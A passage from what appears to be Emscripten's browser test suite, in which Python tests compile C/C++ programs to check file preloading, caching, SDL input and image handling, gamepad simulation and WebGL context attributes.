txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt')
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_test_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_test_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path)
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
ensure_dir(os.path.join('subdirr', 'moar'))
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_test_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
''')
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
''')
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_test_file('data.txt', 'data')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
''')
create_test_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
src = path_from_root('tests', 'sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
src, '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
src = path_from_root('tests', 'sdl_image.c')
self.compile_btest([
src, '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O0', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O2', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_test_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_test_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-s', 'ASYNCIFY']
]:
print(delay, defines, async_)
create_test_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([path_from_root('tests', 'sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_test_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([path_from_root('tests', 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([path_from_root('tests', 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([path_from_root('tests', 'sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([path_from_root('tests', 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([path_from_root('tests', 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([path_from_root('tests', 'test_glfw_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_test_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
